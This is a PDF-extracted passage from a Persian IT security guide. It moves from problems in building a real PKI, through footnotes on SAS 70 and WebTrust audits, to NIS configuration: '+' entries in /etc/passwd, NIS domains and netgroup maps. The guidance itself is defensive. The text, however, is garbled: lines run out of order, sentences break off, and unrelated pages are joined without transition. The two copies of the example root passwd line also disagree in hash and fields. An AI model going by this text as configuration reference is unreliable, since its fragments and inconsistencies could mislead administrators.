ﺍﻳﻨﻜﻪ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﺑﺮﺍﻱ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻮﺿﻮﻋﻲ ﻛﺎﻣ ﹰ
ﻲ ﺍﻧﺘﻬﺎﻱ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺼﺪﻳﻖ ﻧﺸﻮﺩ ،ﻫﻤﻴﻦ ﻣﺘﺨﺼﺼﺎﻥ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺟﺎ ﺍﻓﺘﺎﺩﻩ ﺍﺳﺖ ،ﺍﻣﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟ ﹺ
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻠﻔﻦ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﺍﻳﻦ ﺩﻟﻴﻠﻲ ﻧﺪﺍﺭﺩ ﺟﺰ ﺍﻳﻨﻜﻪ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﻧﻬﺎﻳـﺖ ﺳـﺎﺩﮔﻲ ﺩﭼـﺎﺭ ﻣـﺸﻜﻼﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻭ
ﻏﻴﺮﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﺷﻮﺩ.
ﺩﺭ ﺻﻔﺤﺔ ﺑﻌﺪ ،ﺗﻌﺪﺍﺩ ﻣﻌﺪﻭﺩﻱ ﺍﺯ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺩﺭ ﺳﺎﺧﺘﻦ PKIﻭﺍﻗﻌﻲ ﺑﺎﻳﺪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻘﺎﺑﻠﻪ ﺷﻮﺩ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ.
downloadﻛﺮﺩﻩﺍﻧﺪ ﺑﺪﻭﻥ ﺷﻨﺎﺧﺖ ﻛﺎﻓﻲ ﺍﺯ ﻣﻨﺒﻊ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ .ﺑﻌـﻀﻲ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺁﻟـﻮﺩﻩ ﻫـﺴﺘﻨﺪ ،ﺑﺮﺧـﻲ ﺍﺯ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ downloadﺷﺪﻩ ﺣﺎﻭﻱ ﺗﺮﺍﻭﺍﻫﺎﻱ ﺍﺯ ﭘﻴﺶ ﻧﺼﺐﺷﺪﻩ ﻣﻲﺑﺎﺷﻨﺪ ،ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺭﺍﻳﺞ ﺩﭼﺎﺭ ﺍﺷﻜﺎﻻﺕ ﺟﺪﻱ
ﻫﺴﺘﻨﺪ ﻭ ﺻﺪﻫﺎ ﻭﺻﻠﺔ ﺍﻣﻨﻴﺘﻲ ﻃﻲ ﺳﺎﻟﻴﺎﻥ ﮔﺬﺷﺘﻪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺻﺎﺩﺭ ﺷﺪﻩ ﺍﺳﺖ .ﭘﺲ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﺳﻴـﺴﺘﻢ ﻣﺘـﺼﻞ ﺑـﻪ
ﺷﺒﻜﻪ ﺩﺭ ﮔﺬﺷﺘﺔ ﻧﺰﺩﻳﻚ ﺑﻮﺳﻴﻠﺔ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺧﺘﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ .ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩ ﺍﺯ ﻛﺎﺭﺗﺨﻮﺍﻧﻬﺎ ﻭ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺳﺮﻗﺖ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺭﺍ ﺩﺷﻮﺍﺭﺗﺮ ﻛﻨﺪ ،ﺍﻣﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﻏﻴﺮﻣﻤﻜﻦ ﻧﻤﻲﺳﺎﺯﺩ.
ﻧﺪﺍﻧﻴﺪ -ﻟﺬﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﻫﻨﻮﺯ ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﺩﺍﺭﺍﻱ ﻗـﺴﻤﺘﻬﺎﻳﻲ ﺑـﺮﺍﻱ
ﺳﻦ ،ﺟﻨﺲ ،ﻳﺎ ﻋﻜﺲ ﺍﻓﺮﺍﺩ ﺑﻮﺩﻧﺪ ،ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﮔﻔﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺍﻳﻦ ﺷﻨﺎﺳﻪﻫﺎ ﺑﺪﻭﻥ ﺭﺿﺎﻳﺖ ﻛﺎﺭﺑﺮ ﺍﻓﺸﺎ ﺷﻮﻧﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺁﻧﻬﺎ
ﻣﻮﺭﺩ ﺗﺠﺎﻭﺯ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻭ ﺍﻟﺒﺘﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺣﻖ ﺑﺎ ﺁﻧﻬﺎ ﺑﺎﺷﺪ .ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺻﻠﻲﺗﺮﻳﻦ ﻧﻘﻄﺔ ﻗﻮﺕ ﻛﺎﺭﺕ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺳﺖ:
ﺣﺬﻑ ﮔﻤﻨﺎﻣﻲ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺣﻔﻆ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ،ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻥ ﻫﻮﻳﺖ ﻭ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ.
۱۴۷ﺳﻴﺎﺳﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻤﻴﺰﻱ ﺷﻤﺎﺭﺓ Statement on Auditing Standards) ۷۰؛ (SASﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺧﺪﻣﺎﺗﻲ ،ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺍﺳـﺖ ﻛـﻪ
ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﺣﺴﺎﺑﺪﺍﺭﺍﻥ ﻋﻤﻮﻣﻲ ﮔﻮﺍﻫﻲﺷﺪﻩ ﺁﻣﺮﻳﻜﺎ )American Institute of Certified Public Accountants؛ (AICPAﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ .ﻳـﻚ ﺍﺭﺯﻳـﺎﺑﻲ
SAS 70ﺗﺄﻳﻴﺪ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳﻚ ﻣﺆﺳﺴﻪ ﺧﺪﻣﺎﺗﻲ ،ﺍﻫﺪﺍﻑ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺧﻮﺩ ﺭﺍ ﺗﻮﺳﻂ ﻳﻚ ﺷﺮﻛﺖ ﻣﺴﺘﻘﻞ ﺣﺴﺎﺑﺮﺳﻲ ﻭ ﻣﻤﻴﺰﻱ ﺑـﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﺗﺄﻳﻴـﺪ ﺭﺳـﺎﻧﺪﻩ
ﺍﺳﺖ.
148 Service Auditor Report
۱۴۹ﺗﺤﺖ ﮔﻮﺍﻫﻲ WebTrustﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎ ،ﻳﻚ ﻣﻤﻴﺰ ﻭﺍﺟﺪ ﺷﺮﺍﻳﻂ ﻭ ﻣﺴﺘﻘﻞ ،ﺍﺯ ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﺍﺻﻮﻝ ﭘﺬﻳﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﻔﻬﻤﺪ ﻛﻪ ﺁﻳﺎ ﻳﻚ ﻣﺮﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﻓﻌـﺎﻝ ﺍﺯ
ﺷﺮﺍﻳﻂ ﺣﺪﺍﻗﻞ ﺍﻓﺸﺎ ،ﺧﻂ ﻣﺸﻲ ،ﺗﺠﺮﺑﻴﺎﺕ ،ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﻳﺎ ﻧﻪ.
150 Attestation Report
151 American Bar Association Information Security Committee
152 PKI Assessment Guidelines
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٢٨
root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh
+:: 999:999:::
ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺮﻧﺎﻣﻪ ،ﻓﺎﻳﻞ /etc/passwdﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺨﻮﺍﻧﺪ ﺗـﺎ ﻳـﻚ ﺩﺭﺧﻮﺍﺳـﺖ ﺷـﺒﻜﻪ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻩﺷـﺪﻥ
ﻻ ﻧﮕﺎﺷﺖ passwdﺍﺯ ﻓﺎﻳﻞ /etc/passwdﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺳـﺎﺧﺘﻪ ﻧﮕﺎﺷﺖ passwdﺭﻭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺍﻳﺠﺎﺩ ﻛﻨﺪ .ﻣﻌﻤﻮ ﹰ
ﻣﻲﺷﻮﺩ ،ﻫﺮﭼﻨﺪ ﻫﻤﻴﺸﻪ ﺍﻳﻨﻄﻮﺭ ﻧﻴﺴﺖ .ﻭﻗﺘﻲ NISﻓﺎﻳﻞ /etc/passwdﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ،ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺍﻭﻟﻴﻦ ﺧﻂ ﻗﺎﺑﻞ ﺗﻄﺒﻴﻖ ﺑﺮﺳـﺪ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻛﺎﺭ ﺭﺍ ﻣﺘﻮﻗﻒ ﺧﻮﺍﻫﺪ ﻛﺮﺩ .ﻣﻲﺗﻮﺍﻧﻴﺪ ﻋﻤﻠﻴﺎﺕ ﺩﺭﻳﺎﻓﺖ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺎ ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺑﻪ ﺑﻌﺪ ﺍﺯ ﻋﻼﻣﺖ " "+ﺑﻪ
ﺗﻌﺪﺍﺩ ﺧﺎﺻﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﺎﺻﻲ ﺭﺍ ﺑﺎ ﮔﺬﺍﺷﺘﻦ ﺧﻄﻲ ﻛـﻪ ﺑـﺎ ﻋﻼﻣـﺖ ﺗﻔﺮﻳـﻖ )(-
ﺷﺮﻭﻉ ﻣﻲﺷﻮﺩ ﺍﺯ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻥ ﻣﺴﺘﺜﻨﻲ ﻛﻨﻴﺪ.
NISﻫﻤﭽﻨﻴﻦ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺘﺨﺎﺑﻲ ﺑﻌﻀﻲ ﺩﺍﻣﻨـﻪﻫـﺎ ﺭﺍ ﺍﺯ ﺑﺮﺧـﻲ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﺩﺍﺩﺓ /etc/passwdﻭﺍﺭﺩ ﻛﻨﻴـﺪ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ،ﺍﮔﺮ ﺩﺍﺩﺓ ﺯﻳﺮ ﺭﺍ ﺩﺭ ﻓﺎﻳﻞ /etc/passwdﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ:
root:si4NOjF9Q8JpE:0:Mr. Root:/:/bin/sh
+::999:999:::
ﺁﻧﮕﺎﻩ ﻛﻠﻴﺔ ﺩﺍﺩﻩﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻧﮕﺎﺷﺖ passwdﻣﺮﺑﻮﻁ ﺑﻪ NISﻭﺍﺭﺩ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ،ﺍﻣﺎ ﻫﺮﻳﻚ ﺩﺍﺭﺍﻱ ﺩﺍﺩﺓ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺧـﻮﺩ
ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻛﻪ ﺑﺎ "*" ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪﻩ ﻭ ﺍﺯ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺁﻥ ﺩﺭ ﻣﺎﺷﻴﻦ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨـﺪ .ﻫﻤـﺔ UIDﻫـﺎ ﻭ
ﺍﺳﺎﻣﻲ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺮﺩﺍﺭﻳﺪ ،ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻓﺎﻳﻞ ،ﻣﺎﻟﻜﺎﻥ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎ ﺭﺍ ﻧﻴﺰ ﻣﺎﻧﻨﺪ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﻧﻤﺎﻳﺶ ﺩﻫﻨﺪ.
ﺍﻳﻦ ﺩﺍﺩﻩ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ~userﺩﺭ ﭘﻮﺳﺘﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺑﺪﺭﺳﺘﻲ ﺷﺎﺧﺔ ﺧﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺭﺍ ﻧﮕﺎﺷﺖ ﻛﻨﻨﺪ )ﺑﺎ ﺍﻳﻦ ﻓﺮﺽ ﻛﻪ ﺁﻥ ﺷـﺎﺧﻪ
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ mount ،NFSﺷﺪﻩ ﺍﺳﺖ(.
ﺩﺍﻣﻨﻪﻫﺎﻱ NIS
١٥٦
ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ .ﺍﻳﻦ ﺩﺍﻣﻨﻪﻫﺎ ﻣﺸﺎﺑﻪ ﺩﺍﻣﻨﻪﻫـﺎﻱ DNS ﻭﻗﺘﻲ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ NISﺭﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻲﻛﻨﻴﺪ ﺑﺎﻳﺪ ﻳﻚ ﺩﺍﻣﻨﺔ NIS
ﻧﻴﺴﺘﻨﺪ .ﺩﺍﻣﻨﻪﻫﺎﻱ DNSﻳﻚ ﻣﻨﻄﻘﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﻨﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺩﺍﻣﻨﻪﻫﺎﻱ NISﻳﻚ ﮔﺮﻭﻩ ﺭﺍﻫﺒﺮﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﻣﻌـﻴﻦ
ﻣﻲﻧﻤﺎﻳﻨﺪ .ﻓﺮﻣﺎﻥ domainnameﺩﺭ Unixﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻭ ﺗﻐﻴﻴﺮ ﻧﺎﻡ ﻳﻚ ﺩﺍﻣﻨﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ .ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻥ ﺗﻨﻬـﺎ
ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻳﻚ ﺩﺍﻣﻨﺔ NISﺑﺎﺷﺪ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻫﺮ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺩﺍﻣﻨﻪﻫﺎﻱ NISﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﻛﻨﺪ.
ﺍﺯ ﺩﺍﻣﻨﺔ ﺍﻳﻨﺘﺮﻧﺖ ﺧﻮﺩ ﺑﻌﻨﻮﺍﻥ ﺩﺍﻣﻨﺔ "ﮔﺮﻭﻩ ﺷﺒﻜﻪ" ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ .ﺗﻨﻈﻴﻢ ﺍﻳﻦ ﺩﻭ ﺩﺍﻣﻨﻪ ﺑﻪ ﻳﻚ ﻧﺎ ﹺﻡ ﻣـﺸﺎﺑﻪ ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ ﻧﮕﺎﺭﺷـﻬﺎﻱ
sendmailﺑﺎﻋﺚ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺗﻲ ﺷﺪﻩ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺩﺍﻣﻨﺔ NISﻛﻪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺣـﺪﺱ ﺯﺩﻩ ﻣـﻲﺷـﻮﺩ ﻣﺨـﺎﻃﺮﺍﺕ
ﺍﻣﻨﻴﺘﻲ ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﺩ .ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﻧﻘﺎﻳﺺ NISﻭ NFSﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﻨﻨـﺪ ﺗﻘﺮﻳﺒـﹰﺎ ﻫﻤﻴـﺸﻪ ﻗﺒـﻞ ﺍﺯ ﻫـﺮ
ﺍﻧﺠﺎﻡ ﻫﺮ ﺗﻼﺷﻲ ﺳﻌﻲ ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﮔﻮﻧﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻌﻨﻮﺍﻥ ﻧﺎﻡ ﺩﺍﻣﻨﻪ NISﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ) .ﺍﻟﺒﺘﻪ ﻧﺎﻡ ﺩﺍﻣﻨﻪ NISﻛﻤﺎﻛـﺎﻥ
ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮ ﻗﺎﺑﻞ ﺗﻌﻴﻴﻦ ﺍﺳﺖ(.
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ ١٥٧NISﻣﻲﺗﻮﺍﻧﻴﺪ ﮔﺮﻭﻫﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ .ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ
ﺍﺻﻞ ﺷﺒﻴﻪ ﮔﺮﻭﻫﻬﺎﻱ ﻣﺤﻠﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻧﻬﺎ.
ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺳﺎﺩﻩﺳﺎﺯﻱ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻭ ﻛﺎﻫﺶ ﺍﻣﻜﺎﻥ ﺍﺷﺘﺒﺎﻩ ﺍﺳﺖ .ﺑـﺎ ﻣـﺸﺨﺺ ﻛـﺮﺩﻥ ﻭ ﺍﺳـﺘﻔﺎﺩﺓ ﺻـﺤﻴﺢ ﺍﺯ
ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ،ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺍﻓﺮﺍﺩ ﻭ ﻣﺎﺷﻴﻨﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﻨﺎﺑﻊ ﺣﻴﺎﺗﻲ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﺳﻄﺢ ﺍﻳﻤﻨﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﺍﺩ.
ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ NISﺩﺭ ﻓﺎﻳﻞ /usr/etc/netgroupﻳﺎ /etc/netgroupﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﺷـﻮﺩ.
ﺍﻳﻦ ﻓﺎﻳﻞ ﺷﺎﻣﻞ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺧﻂ ﺩﺭ ﻗﺎﻟﺐ ﺯﻳﺮ ﺍﺳﺖ:
/etc/yp/domainname/netgroup.dir
/etc/yp/domainname/netgroup.pag
/etc/yp/domainname/netgroup.byuser.dir
/etc/yp/domainname/netgroup.byuser.pag
/etc/yp/domainname/netgroup.byhost.dir
/etc/yp/domainname/netgroup.byhost.pag
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺑﻌﻀﻲ ﻣﺎﺷﻴﻨﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ /etc/ypﺑﺼﻮﺭﺕ ﺳﻤﺒﻠﻴﻚ ﺑﻪ /var/ypﻟﻴﻨﻚ ﺷﺪﻩ ﺑﺎﺷﺪ.
ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﻛﻮﭼﻜﻲ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻨﻬـﺎ ﺩﻭ ﮔـﺮﻭﻩ ﺷـﺒﻜﻪ ﺑـﺴﺎﺯﻳﺪ؛ ﻳﻜـﻲ ﺑـﺮﺍﻱ ﻛﻠﻴـﺔ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﺩﻳﮕـﺮﻱ ﺑـﺮﺍﻱ ﻛﻠﻴـﺔ ﻣﺎﺷـﻴﻨﻬﺎﻱ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ .ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﺍﻳﺠﺎﺩ ﻭ ﺭﺍﻫﺒﺮﻱ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺁﺳﺎﻧﺘﺮ ﻣﻲﻛﻨﻨﺪ.
ﻼ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﮔﺮﻭﻩ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺮ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺑﺴﺎﺯﻳﺪ .ﺁﻧﮕﺎﻩ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺰﺭﮔﺘﺮﻱ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﭼﻨﺪ ﮔﺮﻭﻩ ﺑﺴﺎﺯﻳﺪ .ﻣﺜ ﹰ
ﻳﻚ ﮔﺮﻭﻩ ﺍﺻﻠﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷﺎﻣﻞ ﻫﻤﺔ ﺯﻳﺮﮔﺮﻭﻫﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺎﺷﺪ .ﺍﻟﺒﺘﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﻤﻴﻦ ﻛﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ.
ﻳﻚ ﺩﭘﺎﺭﺗﻤﺎﻥ ﻋﻠﻮﻡ ﺑﺎ ﺳﺎﺧﺘﺎﺭﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺧﺘﺎﺭ ﺯﻳﺮ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ:
+@operators::999:999:::
ﺩﺳﺘﻮﺭﺍﺕ ﺑﺎﻻ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺩﺭ ﮔﺮﻭﻩ ﻣﺘﺼﺪﻱﻫﺎ ﻓﻬﺮﺳﺖ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺍﺯ ﻧﮕﺎﺷﺖ NISﺑﻪ ﺣﺎﻓﻈﻪ ﻣﻨﺘﻘﻞ ﻣﻲﻛﻨﻨﺪ .ﻫﻤﭽﻨـﻴﻦ ﺍﮔـﺮ
